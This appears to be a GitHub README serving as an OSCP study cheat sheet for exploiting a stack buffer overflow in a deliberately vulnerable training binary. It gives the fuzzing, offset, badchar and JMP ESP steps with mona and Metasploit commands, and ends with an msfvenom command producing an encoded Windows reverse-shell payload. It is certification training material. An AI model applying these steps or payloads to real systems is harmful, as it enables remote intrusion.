Skip to content


Folders and files

Last commit message
Last commit date

Latest commit



16 Commits

Repository files navigation

OSCP Buffer Overflow Cheat Sheet

In this cheat sheet we will use dostackbufferoverflowgod as a vulnerable application in our exploration process (more info here:

The binary can be downloaded here:

Below are the download links for all the tools needed for the study:

All installation processes are described in the links above.


We will run the script to verify the application's response.

After this step, we will run the script to identify the point that the application will crash. But before that, on your Windows, attach the application to the Immunity Debugger.

Change the amount of "A" in the script until the application broken.


After finding the crash point of the application, we will identify the offset to the EIP address. For this we will generate a string with the pattern_create, from the MSF suite

msf-pattern_create -l 1024

Copy the EIP address into the Immunity Debugger and use the pattern_offset to identify this address

msf-pattern_offset -q 39654138

Now we can run and verify that our EIP has been overwritten with the character "B" (42 in hexadecimal)


To identify badchars we will use mona with the option !mona bytearray.

Insert the mona output in the script and run against the application to identify the badchars.

There are many ways to carry out the badchar identification process (even mona has modules for that), but the most accurate way is visually. Follow the ASCII string in the Immunity Debugger and see what points this string crashed or skipped over.


After knowing the badchars of the application, we will identify the JMP ESP that will be responsible for changing the natural flow of the application and making it run the shellcode that we will insert into the stack.

The OPCODE for JMP ESP is \xff\xe4 (in assembly). Using mona we will locate which register in the application that points to this OPCODE and so we can change the flow of the application to run our shellcode, rewriting the stack from its base (EBP).

Run !mona modules and identify the unprotected modules.

Run !mona find -s "\xff\xe4" to identify which of these pointers have the OPCODE for JMP ESP

Run !mona jmp -r esp -cpb "\x00\x0a" to identify which pointers do not have the badchars found.

By this point you may have already found the correct JMP ESP address. However, if you want to check, run !mona find -s "\xff\xe4" -m dostackbufferoverflowgood.exe directly on the identified vulnerable module.

At this point you will have the base address of the stack or return address (EBP). We need to convert this address to little-endian format to use it in our code. Just invert the bytes to perform this conversion:

0x080416BF  <->  "\xBF\x16\x04\x08"

Exploit time

We can now generate our shellcode excluding the badchars found:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread  -f c –e x86/shikata_ga_nai -b "\x00\x0a"

The EXITFUNC=thread option prevents the shellcode from crashing the application when executing our shellcode.

Now just insert the msfvenom output in our and run it against our application to gain access to the system exploiting the Buffer Overflow


OSCP Buffer Overflow cheat sheet






No releases published